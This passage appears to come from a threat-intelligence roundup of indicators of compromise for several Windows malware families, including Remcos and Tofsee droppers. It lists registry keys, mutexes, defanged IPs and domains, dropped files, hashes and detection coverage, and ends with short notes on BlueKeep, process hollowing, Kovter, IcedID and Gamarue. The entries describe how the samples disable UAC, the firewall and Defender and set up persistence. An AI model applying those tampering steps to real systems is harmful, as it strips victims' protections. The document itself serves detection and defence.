\n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: EnableFirewall ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: DoNotAllowExceptions ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE \nValue Name: DisableNotifications ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION \nValue Name: jfghdug_ooetvtgk ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: JudCsgdy ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Defender ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Userinit ` | 2 \nMutexes | Occurrences \n---|--- \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 16 \n`shell.{<random GUID>}` | 11 \n`{<random GUID>}` | 5 \n`Local\\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}` | 3 \n`Local\\{7FD07DA6-D223-0971-D423-264D4807BAD1}` | 3 \n`Local\\{B1443895-5CF6-0B1E-EE75-506F02798413}` | 3 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`178[.]128[.]255[.]179` | 16 \n`178[.]33[.]158[.]0/27` | 16 \n`178[.]33[.]159[.]0/27` | 16 \n`178[.]33[.]160[.]0/25` | 16 \n`104[.]24[.]104[.]254` | 13 \n`104[.]24[.]105[.]254` | 11 \n`34[.]206[.]50[.]228` | 8 \n`54[.]164[.]0[.]55` | 6 \n`208[.]67[.]222[.]222` | 3 \n`172[.]217[.]7[.]206` | 2 \n`86[.]105[.]1[.]11` | 2 \n`172[.]217[.]11[.]46` | 1 \n`46[.]165[.]221[.]154` | 1 \n`91[.]195[.]240[.]13` | 1 \n`195[.]201[.]179[.]207` | 1 \n`192[.]3[.]8[.]218` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`api[.]blockcypher[.]com` | 16 \n`bitaps[.]com` | 16 \n`chain[.]so` | 16 \n`btc[.]blockr[.]io` | 16 \n`bc-prod-web-lb-430045627[.]us-east-1[.]elb[.]amazonaws[.]com` | 11 \n`resolver1[.]opendns[.]com` | 3 \n`222[.]222[.]67[.]208[.]in-addr[.]arpa` | 3 \n`myip[.]opendns[.]com` | 3 \n`wdwefwefwwfewdefewfwefw[.]onion` | 2 \n`ahrkvtgc[.]com` | 1 \n`fhvkufnnrlyfvx[.]com` | 1 \n`shebkucvrunporc[.]com` | 1 \n`hd63ueor8473y[.]com` | 1 \n`qegdtnvuanlyid[.]com` | 1 \n`gcijrxipe[.]com` | 1 \n`ogltynjmtfiu[.]com` | 1 \n`rlkeqcsygmmglv[.]com` | 1 \n`wglxvkpybhnxhfv[.]com` | 1 \n`aynycxbgodmwi[.]com` | 1 \n`uahvwkjphhklqigod[.]com` | 1 \n`en[.]voltster12v[.]com` | 1 \n`cloud[.]pathwaystopromise[.]info` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\d19ab989` | 16 \n`%TEMP%\\d19ab989\\4710.tmp` | 16 \n`%TEMP%\\d19ab989\\a35f.tmp` | 16 \n`%TEMP%\\tmp<random, matching [A-F0-9]{1,4}>.tmp` | 16 \n`%TEMP%\\tmp<random, matching [A-F0-9]{1,4}>.bmp` | 16 \n`<dir>\\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.txt` | 16 \n`<dir>\\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.hta` | 16 \n`<dir>\\<random, matching [A-Z0-9\\-]{10}.[A-F0-9]{4}> (copy)` | 11 \n \n#### File Hashes\n\n` 00fd6d5030b6f36f2acef17f933bf87a5e83104e86edc18467318362fe41bda0 0db052f343bb2c323603fd34eea55262f5448450feaf0dbb03e77da1d1da204e 1beb4d8646023322d8eefba6bee5d899f375bd099050367e8af5321eda512db5 1e78866a82b6016b280f4935ab6aa8e6d59456c5fdb4900ef456cb6216fba878 2766aa41ce912acac61bc342873b1d016c016780600846b77ccee98eaea0a0c1 316c4f6ce0478622772c16aa1821297569a27d52a8ab65262bc1702e864d3cff 367afe107f332d7fd9676b75a76624a2378758104316278a28984ba1815073b2 36bee89b83bc3b628abb726b4530a7fda8b86448594543532ec303f659cd1c1d 36f70b90e9ef4c34440e13c064d05dc0996debd74a7361109532bfda65108ab6 382d8c432cf11339a41b6c0371a226b7567620c6440b0ebdf7dc1610db4ec3c4 38bc3877ec4f87307ccb3d23dc7ea58b117fccfa1ccba938fa9dcff4bb956fe2 4a2803f8ddf258eb4d41ff15f617307cc6eda54bd4e635b0314c9706cff9007e 4b9c203a3f4a7129d0701c5f3e8266d217c836b497c7acf762ad7f8eab508349 4bf2851749232054a7f08faa294520d3bf372b84eb5d20707add176acb1e9aa6 54852be80e90db1d2550128bdf82028befcdf1340da2a1add061e7f6027eb272 552a32a57b59b7498a79f187d2cbfdf7c797395024392b7f76d7b1fff94fea8b 576a3ddc924aea581818f397bca1fe1a3788f892d81b8a2287c03566bc7e6242 5d2e3adf40ec1ae0f6032213a8bb27be9eaf5ae99a6f09239088e8c47944ed02 7275da6b777a1c5c9392766d7fec3c4f0b07e93af161d11b7da000e6157178b0 73796be2c91ffba6b1981860fdc79f7862bbe4b5dd890a42f3d1f8cd38530001 7420f8c4f266ebd29b867ef980309bfe8a1d8845f7683e6f8db734c5812eb5e8 89fc2e256c70fb0235ebb0a9daa3f096ba7722fd06b7b0866a1e87b1ea003f79 a04e9bf2aed6eef853c5a5f2ce6131963cb7cd15971c02e6f2afa18846737e74 a508a738cc8d633613641680ca3a7df98be4fa3d6b8f28a16904ba7aa600b89c ad4a8230c0a8d5deb3d8253ef0e2a9c41531eb1560e538ef8cb1a5ff56e7cb27 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nCloudlock | N/A \nCWS | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nEmail Security | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nNetwork Security | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nUmbrella | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nWSA | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \n \n#### Screenshots of Detection\n\n#### AMP\n\n[![](https://1.bp.blogspot.com/-gpxC0L9pe_I/XdgZwRwyC-I/AAAAAAAAC7k/OcpcZwodBgQcxqeiDUdrXHh72ZnvXUZVgCLcBGAsYHQ/s400/73796be2c91ffba6b1981860fdc79f7862bbe4b5dd890a42f3d1f8cd38530001_amp.png)](<https://1.bp.blogspot.com/-gpxC0L9pe_I/XdgZwRwyC-I/AAAAAAAAC7k/OcpcZwodBgQcxqeiDUdrXHh72ZnvXUZVgCLcBGAsYHQ/s1600/73796be2c91ffba6b1981860fdc79f7862bbe4b5dd890a42f3d1f8cd38530001_amp.png>)\n\n \n\n\n \n\n\n#### Umbrella\n\n[![](https://1.bp.blogspot.com/-ARF_WT0-Mlw/XdgZ1jhkeDI/AAAAAAAAC7o/jxa_5xAENAoebgaF25kMQRg6n-QCBSgSQCLcBGAsYHQ/s640/73796be2c91ffba6b1981860fdc79f7862bbe4b5dd890a42f3d1f8cd38530001_umbrella.png)](<https://1.bp.blogspot.com/-ARF_WT0-Mlw/XdgZ1jhkeDI/AAAAAAAAC7o/jxa_5xAENAoebgaF25kMQRg6n-QCBSgSQCLcBGAsYHQ/s1600/73796be2c91ffba6b1981860fdc79f7862bbe4b5dd890a42f3d1f8cd38530001_umbrella.png>)\n\n \n\n\n \n\n\n \n\n\n#### Malware\n\n[![](https://1.bp.blogspot.com/-otI_RS-9_zo/XdgZ61uz6XI/AAAAAAAAC7s/TZ-WFRzqNa0JafWIdy5Jjm0DFZ7DS67RACLcBGAsYHQ/s640/a508a738cc8d633613641680ca3a7df98be4fa3d6b8f28a16904ba7aa600b89c_malware.png)](<https://1.bp.blogspot.com/-otI_RS-9_zo/XdgZ61uz6XI/AAAAAAAAC7s/TZ-WFRzqNa0JafWIdy5Jjm0DFZ7DS67RACLcBGAsYHQ/s1600/a508a738cc8d633613641680ca3a7df98be4fa3d6b8f28a16904ba7aa600b89c_malware.png>)\n\n \n\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Remcos-7395733-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\LOCAL APPWIZARD-GENERATED APPLICATIONS ` | 24 \n`<HKCU>\\SOFTWARE\\LOCAL APPWIZARD-GENERATED APPLICATIONS\\MYIMGAPP ` | 24 \n`<HKCU>\\SOFTWARE\\LOCAL APPWIZARD-GENERATED APPLICATIONS\\MYIMGAPP\\RECENT FILE LIST ` | 24 \n`<HKCU>\\SOFTWARE\\LOCAL APPWIZARD-GENERATED APPLICATIONS\\MYIMGAPP\\SETTINGS ` | 24 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Snk ` | 19 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Snk ` | 19 \n`<HKCU>\\SOFTWARE\\XLR4615DFT-CRBSFT \nValue Name: exepath ` | 19 \n`<HKCU>\\SOFTWARE\\XLR4615DFT-CRBSFT \nValue Name: licence ` | 19 \n`<HKCU>\\SOFTWARE\\XLR4615DFT-CRBSFT ` | 19 \n`<HKCU>\\SOFTWARE\\NETWIRE ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: MServices ` | 1 \n`<HKCU>\\SOFTWARE\\NETWIRE \nValue Name: HostId ` | 1 \n`<HKCU>\\SOFTWARE\\NETWIRE \nValue Name: Install Date ` | 1 \nMutexes | Occurrences \n---|--- \n`Remcos_Mutex_Inj` | 19 \n`XLR4615DFT-CRBSFT` | 19 \n`IMYGdLWM` | 1 \n`Global\\00430b21-08fc-11ea-a007-00501e3ae7b5` | 1 \n`Global\\006bff81-08fc-11ea-a007-00501e3ae7b5` | 1 \n`Global\\03cef101-08fc-11ea-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`186[.]170[.]64[.]85` | 17 \n`186[.]170[.]70[.]152` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`proyectobasevirtualcol[.]com` | 19 \n`recuperaciondecartera[.]website` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\install.vbs` | 19 \n`%APPDATA%\\System32` | 19 \n`%APPDATA%\\System32\\Snk.exe` | 19 \n`%APPDATA%\\Runtime3` | 19 \n`%APPDATA%\\Runtime3\\1627.dat` | 19 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 15 \n`%TEMP%\\8D6B.dmp` | 1 \n`%TEMP%\\8adb_appcompat.txt` | 1 \n`%APPDATA%\\Install` | 1 \n`%APPDATA%\\Install\\MServicesNet.exe` | 1 \n \n#### File Hashes\n\n` 01c3ab58c66605c68709c785147dc5be803235222cdbcf535e03ad312a2475bf 04ee0252ab6db7de6c8b774254265037413a9979ac9c492918ea66b45acedf5c 0ab93b4561aefbb2dbaccfcb8dc2a000ba14c10ca1bf8222da5125b948e5116f 1c6a3d4989760e577e07a238dfc81f511c23d1cc1840418af3fb01264cc8a54c 2ac0166d713688697266de2427af824786fd76d5f110e758108f1ae3a7eb6037 48097d2e7e7bb93c4319223a1829239031a1ebbb641a42dcee1b82ada6f8a179 482a3fe73c9fed841695232330c1316472f6f134a6ae65e1f7da61aea4a246bf 70c958e641eee241550a356c0bf81856e3087757471903ee26bb4751d900249d 72cbc8432180fdc6f242e3ce62b80e269d6ead62df1c054e475690c89e3de560 740f6504c165641c9460c853855a586bab05a92ef6d4d4f0435465ea000840b8 7b067dfdd9a77f27b8b16237027c7d159760fb7bbd7effc3663d1d883a50c086 7f5c18605851bc58ef1eba832d3c16f89492ddaeacabee5fa4ad5c8f7402e4bc 843aa842d5d0a8975e8320318960bac3c5356e6e13be3918358e6cb81395e410 8ddc6f9e1435f94e7f8d6aac4cceb7b751b4a70b7e9c11bc46ce81c2fc1efcf5 9808a934240773b0a1cd470d1d87c9f8f54f54bde5801ceae3113677e9378f52 baabcbcd2c97382f2ca9b5786d21f6ed781f5d91cbea916618c0c7aebfcb90b2 bf8938bb97fc959dfaa4fc13d1ca43106e3c0524a626d5778ff7d5d987d9f90e c157967fafed0df923bfa887e443562d13e159eeb0391aa0e4243ec833aacce3 ca2c6609831dc62ed1560aa03b949a897203e62f3dcad833e6abebde6f15232d d643273166b2e97bd4dff80e0f351404f14f2523d713e2f5691e530d94515327 d91f5a063d69697c887a8f0c495c88d699e118fe3367e1b22eb7cf2fcdcabbbe d96399e30a6ae180e5c138453d7c74129e08ab40fa158cf85e0cf7663ed873dc fbb1fed1b420443abadd4d7d091fd448c85a64d2cf8521aa4152277b7821bf0a fc7f4839fea7be50cdb46251be9dbcc6f974232c8eb0e97f2959d99c629f197f `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nCloudlock | N/A \nCWS | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nEmail Security | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[![](https://1.bp.blogspot.com/-kASeedqs8rY/XdgaMaN8DNI/AAAAAAAAC74/uu6qJ0X-lT01-0WmXyw6YJFeMtZf21lxQCLcBGAsYHQ/s400/fc7f4839fea7be50cdb46251be9dbcc6f974232c8eb0e97f2959d99c629f197f_amp.png)](<https://1.bp.blogspot.com/-kASeedqs8rY/XdgaMaN8DNI/AAAAAAAAC74/uu6qJ0X-lT01-0WmXyw6YJFeMtZf21lxQCLcBGAsYHQ/s1600/fc7f4839fea7be50cdb46251be9dbcc6f974232c8eb0e97f2959d99c629f197f_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Tofsee-7402230-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 3 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 3 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 3 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config2 ` | 3 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\ibpvucix ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IBPVUCIX \nValue Name: Type ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IBPVUCIX \nValue Name: Start ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IBPVUCIX \nValue Name: ErrorControl ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IBPVUCIX \nValue Name: DisplayName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IBPVUCIX \nValue Name: WOW64 ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IBPVUCIX \nValue Name: ObjectName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IBPVUCIX \nValue Name: Description ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\exlrqyet ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\nguazhnc ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\EXLRQYET \nValue Name: Type ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\EXLRQYET \nValue Name: Start ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\EXLRQYET \nValue Name: ErrorControl ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\EXLRQYET \nValue Name: DisplayName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\EXLRQYET \nValue Name: WOW64 ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\EXLRQYET \nValue Name: ObjectName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\EXLRQYET \nValue Name: Description ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\NGUAZHNC \nValue Name: Type ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\NGUAZHNC \nValue Name: Start ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\NGUAZHNC \nValue Name: ErrorControl ` | 1 \nMutexes | Occurrences \n---|--- \n`{37529D08-A67E-40B3-B0F2-EB87331B47F5}` | 9 \n`Global\\<random guid>` | 7 \n`A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A` | 1 \n`A238FB802-231ABE6B-F2351354-74D8EB40-AEDEC6C4` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`239[.]255[.]255[.]250` | 3 \n`69[.]55[.]5[.]250` | 3 \n`216[.]239[.]36[.]21` | 3 \n`172[.]217[.]12[.]196` | 3 \n`104[.]47[.]2[.]33` | 3 \n`46[.]4[.]52[.]109` | 3 \n`43[.]231[.]4[.]7` | 3 \n`213[.]209[.]1[.]129` | 3 \n`104[.]47[.]1[.]33` | 3 \n`192[.]0[.]47[.]59` | 3 \n`194[.]25[.]134[.]8` | 3 \n`144[.]160[.]235[.]143` | 3 \n`216[.]40[.]42[.]4` | 3 \n`188[.]125[.]72[.]73` | 3 \n`85[.]114[.]134[.]88` | 3 \n`46[.]28[.]66[.]2` | 3 \n`78[.]31[.]67[.]23` | 3 \n`188[.]165[.]238[.]150` | 3 \n`93[.]179[.]69[.]109` | 3 \n`176[.]9[.]114[.]177` | 3 \n`104[.]47[.]45[.]33` | 2 \n`47[.]43[.]18[.]9` | 2 \n`31[.]13[.]65[.]174` | 2 \n`192[.]36[.]171[.]203` | 2 \n`54[.]184[.]154[.]83` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 3 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 3 \n`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 3 \n`mta5[.]am0[.]yahoodns[.]net` | 3 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 3 \n`t-online[.]de` | 3 \n`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 3 \n`smtp-in[.]libero[.]it` | 3 \n`whois[.]iana[.]org` | 3 \n`libero[.]it` | 3 \n`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 3 \n`yahoo[.]co[.]uk` | 3 \n`whois[.]arin[.]net` | 3 \n`eur[.]olc[.]protection[.]outlook[.]com` | 3 \n`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 3 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 3 \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 3 \n`al-ip4-mx-vip1[.]prodigy[.]net` | 3 \n`mx00[.]t-online[.]de` | 3 \n`msa[.]hinet[.]net` | 3 \n`msa-smtp-mx1[.]hinet[.]net` | 3 \n`irina94[.]rusgirls[.]cn` | 3 \n`anastasiasweety[.]rugirls[.]cn` | 3 \n`beautyrus[.]cn` | 3 \n`ipinfo[.]io` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 13 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 13 \n`%System32%\\Tasks\\Intel Rapid` | 9 \n`%APPDATA%\\Intel Rapid` | 9 \n`%APPDATA%\\Intel Rapid\\IntelRapid.exe` | 9 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\IntelRapid.lnk` | 9 \n`%HOMEPATH%\\Start Menu\\Programs\\Startup\\IntelRapid.lnk` | 7 \n`%TEMP%\\CC4F.tmp` | 7 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 3 \n`%APPDATA%\\Microsoft\\Crypto\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Document Building Blocks\\1033\\14\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Document Building Blocks\\1033\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Document Building Blocks\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Excel\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\HTML Help\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Internet Explorer\\Quick Launch\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Internet Explorer\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Internet Explorer\\UserData\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\MMC\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Office\\Recent\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Office\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Outlook\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\PowerPoint\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Proof\\RyukReadMe.html` | 1 \n`%APPDATA%\\Microsoft\\Protect\\RyukReadMe.html` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 4a893b16147c2cd5df11b1f4df08eddc5505f0aafa9f58747ad0f89d53e65492 4b667f73da0fd2cf8b54efa73239e377c10111fd00e08b9ddaa2adee2a873576 4ee405168c9283d73e2ee5913b2c817b824c02e62b8af2750865dc9a6b7e1f4a 75504fa32f3c2e6c56120a26f6af451dc0c688cf1a1dcfe3f656152326ac3584 7acf0435afa75bdc00575208f16f21c0dec8c101fbcefe96836af71c4c628158 8909eeaeb9edc9b01bfae72a64e84b4589c1d2161debee40dd2ab5f5f0ec3858 89678ea136df0b80c0bd0620836624ff785540801ca1f5beec5e7ee76755b684 981a0821cf4b4992d07b5d74ec24a490f4dee396f8e05d66e85cf87809676fe6 9cf0bfd67b4f99bf1ba21175ef3803b18dc774772187b6eb0e610cdacf759cad b8068519f39fb924188bb343eead3b327604a5a09dd3f51fe2486b90b85ac17b bc720a574efb5d1a1a14489ca4d970cfe9d430f6001c2be09e4dc53d2c80b5cb c03e1affd3cb95c110e931d5571cd5d6c8464af36ca1ce1a0114cd9c1eeedb21 d0b333bb1d8c6c153f91a3a5116a1f989c7759dc31f09008288aa720c65371b8 d0c67d3e0edfe1e0d835dbe5d6676c906c418877500b60044f91305d8b4b43ca da58160abd6e306350ecb6647095970ea0dcbcddc1a5b6671b8575885482a824 dd684a06a5d8f00f3e2efb903898d5311d844eb460b7a6a2531f05c69ac56cbe eadaf620c2eb15ad86a06b25ec32533e44b011cad86c9c02f4bdfae7c2e76b7e ec912191e42a253522747774e1de1db3a4e9ce30942b5924518599e3e87c94be ee5a58e36602b2dc16dc0dfa3b3152721ae46e8d13efe436ab647fff0d612a63 ef419240c15389367b533f498b688382d14c57f8befdda8ea6cd5393529e1590 f2f7ced6ea5d6924fcff354da88b905fda434d24b9e2ad4c6f4b5bee5d98b448 fac2a73ee76ccc941ea723ebb1e559c194676a7b5663e948a25a31487ff0193a `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nCloudlock | N/A \nCWS | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nEmail Security | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nNetwork Security | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nUmbrella | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nWSA | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \n \n#### Screenshots of Detection\n\n#### AMP\n\n[![](https://1.bp.blogspot.com/-JEc8bwth5Hs/XdgacZtS7jI/AAAAAAAAC8A/x4W0UgIRvZIA_UoHQATz6_uliTosEEiDgCLcBGAsYHQ/s400/4a893b16147c2cd5df11b1f4df08eddc5505f0aafa9f58747ad0f89d53e65492_amp.png)](<https://1.bp.blogspot.com/-JEc8bwth5Hs/XdgacZtS7jI/AAAAAAAAC8A/x4W0UgIRvZIA_UoHQATz6_uliTosEEiDgCLcBGAsYHQ/s1600/4a893b16147c2cd5df11b1f4df08eddc5505f0aafa9f58747ad0f89d53e65492_amp.png>)\n\n \n\n\n#### Umbrella\n\n \n\n\n[![](https://1.bp.blogspot.com/-ReWvBc77rrE/XdgaiyT6PvI/AAAAAAAAC8E/Juv_ktU3y9UPMsmuIVqMh3oyO9H6LwDxACLcBGAsYHQ/s640/da58160abd6e306350ecb6647095970ea0dcbcddc1a5b6671b8575885482a824_umbrella.png)](<https://1.bp.blogspot.com/-ReWvBc77rrE/XdgaiyT6PvI/AAAAAAAAC8E/Juv_ktU3y9UPMsmuIVqMh3oyO9H6LwDxACLcBGAsYHQ/s1600/da58160abd6e306350ecb6647095970ea0dcbcddc1a5b6671b8575885482a824_umbrella.png>)\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (15989) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nExcessively long PowerShell command detected \\- (760) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nProcess hollowing detected \\- (407) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nKovter injection detected \\- (347) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nIcedID malware detected \\- (297) \nIcedID is a banking Trojan. It uses both web browser injection and browser redirection to steal banking and/or other financial credentials and data. The features and sophistication of IcedID demonstrate the malware author's knowledge and technical skill for this kind of fraud, and suggest the authors have previous experience creating banking Trojans. IcedID has been observed being installed by Emotet or Ursnif. Systems infected with IcedID should also be scanned for additional malware infections. \nGamarue malware detected \\- (183) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. 